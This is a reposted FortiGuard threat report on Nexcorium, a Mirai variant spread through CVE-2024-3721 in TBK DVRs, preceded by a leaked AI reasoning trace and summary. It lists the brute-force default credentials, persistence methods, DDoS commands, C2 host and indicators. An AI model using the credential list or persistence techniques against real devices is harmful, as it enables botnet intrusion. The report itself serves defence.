嗯,用户让我帮忙总结一下这篇文章的内容,控制在一百个字以内,而且不需要用“文章内容总结”之类的开头。首先,我需要快速浏览一下文章,抓住主要信息。 文章主要讲的是一个针对TBK DVR设备的恶意软件攻击。攻击者利用了CVE-2024-3721漏洞,植入了一个叫做Nexcorium的Mirai变种。这个恶意软件支持多种架构,比如ARM、MIPS和x86-64,并且有多种持久化机制,比如修改inittab、rc.local、创建systemd服务和设置cron任务。此外,它还能进行DDoS攻击,包括UDP flood、TCP ACK flood等多种类型。 用户可能是一个网络安全相关人员,或者是企业IT管理员,他们需要快速了解这个威胁的严重性以及如何应对。因此,在总结时要突出关键点:漏洞利用、恶意软件功能、攻击目标以及影响。 接下来,我要确保在100字以内涵盖这些要点:TBK DVR设备被攻击,利用CVE-2024-3721漏洞植入Nexcorium恶意软件,支持多架构,具备持久化和DDoS能力。同时提到影响范围广和安全建议。 最后,检查一下语言是否简洁明了,避免使用专业术语过多,让读者一目了然。 </think> TBK DVR设备被发现存在严重漏洞(CVE-2024-3721),被用于植入名为Nexcorium的恶意软件。该软件支持多架构(如ARM、MIPS、x86-64),具备持久化机制(如修改启动脚本、创建服务)及DDoS攻击能力(包括UDP flood等)。攻击者通过漏洞利用和暴力破解扩大感染范围。此威胁对物联网设备构成重大风险。 2026-4-17 13:0:0 Author: feeds.fortinet.com(查看原文) 阅读量:40 收藏
Affected Platforms: TBK DVR-4104, DVR-4216
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
IoT devices are increasingly prime targets for large-scale attacks due to their widespread use, lack of patching, and often weak security settings. Threat actors continue exploiting known vulnerabilities to gain initial access and deploy malware that can persist, spread, and cause distributed denial-of-service (DDoS) attacks.
FortiGuard Labs has analyzed a recent campaign exploiting CVE-2024-3721 in TBK DVR devices to deliver a multi-architecture Mirai variant called Nexcorium. By examining the infection chain, persistence mechanisms, and attack capabilities, we offer insights into the operational behavior of the associated threat actor and its potential impact on targeted environments.
Incidents
The threat actors delivered a downloader script by exploiting CVE-2024-3721, an OS command injection vulnerability in TBK DVR devices through manipulation of the mdb / mdc arguments.
Figure 1: Exploit traffic via CVE-2024-3721
The exploit features a custom HTTP header, “X-Hacked-By,” with the value “Nexus Team – Exploited By Erratic.” Based on this artifact, we think the activity is likely linked to a threat actor, which we suggest identifying as “Nexus Team.” However, this actor is not widely known.
The downloader script, called dvr, fetches malware samples with filenames starting with nexuscorp and targets multiple Linux architectures, including ARM, MIPS R3000, and x86-64 (AMD64). The script sets the permissions of the retrieved malware to 777 and runs it with an argument that indicates the exploited device on the victim host.
Figure 2: Downloader shell script “dvr”
Malware Analysis
This analysis is based on the “nexuscorp.x86” sample. Upon execution, the malware shows the string “nexuscorp has taken control.”
Figure 3: Display string after execution
Nexcorium has a similar architecture to the Mirai variant, including XOR-encoded configuration table initialization, watchdog module, and DDoS attack module.
The malware first performs XOR decoding to extract its embedded configuration, which includes C2 server domain and port, persistence-related shell commands, a hard-coded brute-force wordlist, DDoS attack commands retrieved from the C2 server, and embedded exploit code.
Figure 4: XOR-Encoded configuration with the key 0x13
Figure 5: XOR-Encoded configuration with the key 0xFD
Nexcorium shares an architecture similar to other Mirai variants. It consists of three core modules: watchdog, scanner, and attacker. The watchdog component uses the string NXS_WD_CHILD as a sub-process role marker to distinguish watchdog-spawned child processes.
Figure 6: Watchdog subprocess role marker
Nexcorium performs self-integrity checks by first storing executive arguments in global variables and retrieving the current execution path from /proc/self/exe. It calculates the hash of the executable file using the FNV-1a algorithm. If the original file is missing, unreadable, or its hash does not match, the malware creates a duplicate under a different filename and sets the file permissions to 700.
Figure 7: Self-replication
Notably, the malware includes an exploit for CVE-2017-17215, targeting Huawei HG532 devices. This is also commonly seen in other Mirai variants.
Figure 8: XOR-Encoded CVE-2017-17215 exploit
The exploit is stored in table ID 23 and used in the scanner component. Once Nexcorium connects to the victim host, the module looks up the table, retrieves the CVE-2017-17215 payload, and sends a malicious packet.
Figure 9: Send CVE-2017-17215 exploit if the socket is established
Additionally, the malware contains a hard-coded username and password list used for brute-force attacks. Most entries include default credentials.
| ubuntu | guest | support | default |
| 12345 | 123456 | changeme | hikvision |
| operator | 888888 | Administrator | meinsm |
| 7ujMko0admin | admin123 | admin1234 | admintest |
| comcomcom | motorola | password | daemon |
| OxhlwSG8 | S2fGqNFs | tlJwpbo6 | D-Link |
| netscreen | 7ujMko0vizxv | GM8182 | Root1 |
| Zte521 | antslq | cat1029 | dreambox |
| grouter | hg2x0 | huigu309 | ipcam_rt5350 |
| jauntech | solokey | swsbzkgn | taZz@23495859 |
| tsgoingon | vertex25ektks123 | xc3511 | xmhdipc |
| Zhongxing | telnet | telnetadmin |
The malware scan involves the victim's hosts opening a Telnet connection. It then starts a brute-force attack using the previous wordlist. If Nexcorium successfully logs in, it executes commands to check if it gets a shell, including system, shell, sh, and cat /bin/busybox.
Figure 10: Execute shell command if Nexcorium successfully logs in via telnet
Once Nexcorium executes the command, it will parse and verify the victim host’s architecture using its hard-coded list.
Figure 11: Parsing the architecture information response from the victim host
The malware retrieves the actual execution path from /proc/self/exe again for persistence purposes. If it is not running from /usr/local/bin/, it copies itself to /usr/local/bin/sysd and proceeds to establish persistence through multiple mechanisms.
1. Init configuration
It updates /etc/inittab to make sure the process restarts if it stops.
Figure 12: Persistence method via /etc/inittab
2. Startup script
It creates or updates /etc/rc.local to ensure execution at system startup.
Figure 13: Persistence method via /etc/rc.local
3. Systemd service
It then checks common system paths (e.g., /bin/systemctl, /usr/bin/systemctl, and /etc/system/system) and creates a service file at /etc/systemd/system/persist.service, enabling it to run automatically at startup.
Figure 14: Persistence method via creating daemon
4. Cron job
It creates a scheduled task using crontab to ensure it runs after reboot.
Figure 15: Persistence method using crontab
After completing the persistence setup, the malware deletes its original binary from the current execution path to evade analysis.
Figure 16: Self-delete to evade anaysis
Based on the XOR-decoded configuration, Nexcorium supports multiple DDoS attack methods, including UDP flood, TCP ACK flood, TCP SYN flood, TCP generic flood, SMTP flood, TCP PSH flood, TCP URG Flag flood, UDP blast flood, and VSE query flood. It can stop ongoing DDoS attacks and terminate its own process as well.
| Command | Attack ID | Description |
| udp | 0 | UDP Flood |
| ack | 10 | TCP ACK Flood |
| syn | 3 | TCP SYN Flood |
| std | 4 | TCP Generic Flood |
| stmp | 9 | SMTP Flood |
| psh | 5 | TCP PSH Flood |
| synd | 7 | TCP SYN Flood Variant |
| urg | 6 | TCP URG Flag Flood |
| udb | 8 | UDP Blast Flood |
| vse | 1 | VSE Query Flood |
| tcpa | 12 | TCP ACK + PSH Flood |
| killattk | - | Stop Attack |
| botkill | - | Kill Bot |
The malware initializes its attack modules by allocating an array and adding the offset of each attack module to it. It then establishes a connection with the C2 domain r3brqw3d[.]b0ats[.]top and parses commands retrieved from the C2 server to launch subsequent attacks.
Figure 17: Attack method to parse commands from the C2 server
Conclusion
The Nexcorium malware displays typical traits of modern IoT-focused botnets, combining vulnerability exploitation, support for multiple architectures, and various persistence methods to sustain long-term access to infected systems. Its use of known exploits, such as CVE-2017-17215, along with extensive brute-force capabilities, underscores its adaptability and efficacy in increasing its infection reach.
Additionally, its diverse range of DDoS attack vectors and centralized command-and-control communication indicate its primary role in coordinated attack campaigns. The use of customized exploit artifacts, such as the “X-Hacked-By” header, also provides valuable clues linking the activity to the suspected threat actor.
The continuous monitoring of vulnerability exploitation trends, along with proactive detection of malicious traffic and behavior patterns, remains essential for reducing similar threats targeting IoT and networked systems.
Fortinet Protections
The malware described in this report is detected and blocked by FortiGuard Antivirus as:
BASH/Mirai.AEH!tr.dldr
ELF.Mirai.ATL!tr
ELF/Nexcorium.A!tr
ELF/Mirai.EGX!tr
The FortiGuard AntiVirus service engine is integrated into FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running these products with up-to-date signatures are protected against the malware components described in this report.
The FortiGuard Web Filtering Service blocks the C2 server.
FortiGuard Labs provides an IPS signature against attacks exploiting the following vulnerabilities:
CVE-2024-3721: 55717 TBK.DVR.SOSTREAMAX.Command.Injection
Organizations seeking to strengthen foundational security awareness might also consider completing Fortinet Certified Fundamentals (FCF) training in Cybersecurity. This module is designed to help end users learn how to identify and protect themselves from phishing attacks.
The FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks infrastructure associated with this campaign by correlating malicious IP intelligence collected from Fortinet’s global sensor network, CERT collaborations, MITRE, trusted industry partners, and other intelligence sources.
If you believe this or any other cybersecurity threat has impacted your organization, contact our Global FortiGuard Incident Response Team for assistance.
IOCs
Hosts
84[.]200[.]87[.]36
176[.]65[.]148[.]186
r3brqw3d[.]b0ats[.]top
Files
Downloader
696aeb6321313919f0a41a520e6fa715450bbfb271a9add1e54efe16484a9c35
Nexcorium
37132e804ccb3fc4ba1f72205da70c3d7a6e66b43178707a9d8ee1156d815c21
e4789416c35b345e75c023a8c07c207c79937c6a5444e1c29d85d18d2f660d8c
0b510f93f47590791626d2fa74ddd62ba6eb8a5a5bb7b8476c0ceffc7be94ebe
9b805585c457811d2c5c5664ede9ee869b53e3c9999100505d7ee8de7f855fdf
95d1eb12d58206319c514c7240d058c512bb22b31f6ea22ed8be3ae44305c9f7
7c01d5b53861cd34e10a79fdea16dcf08bce9c78ed72abd6d6f3e9ce75a24734
838e35b62a6b38675e467301166cdcc54f98d528fe43d56936caeffec88ac696
2ccf23b8165e8c05899aa7ba4755b896ebf1d20d3b701cffdc768482486b0a74
29404df12a7723ce46c8b199c88a808aa315dd8ff8fd1e06a34ccd3d16f4553b
b1274de00a7f3d7ab9792ec3456e9d5bf057738666f34183f1d72060e2d4f678
721c7cb2109ec97c14413cb8b58ddce0ecf0c1f13f22ee4f72eed79b57592cf5
89dae116c77b0035277d39dfe01043624427c119ddee8883a3ba54a42a6ae400
如有侵权请联系:admin#unsafe.sh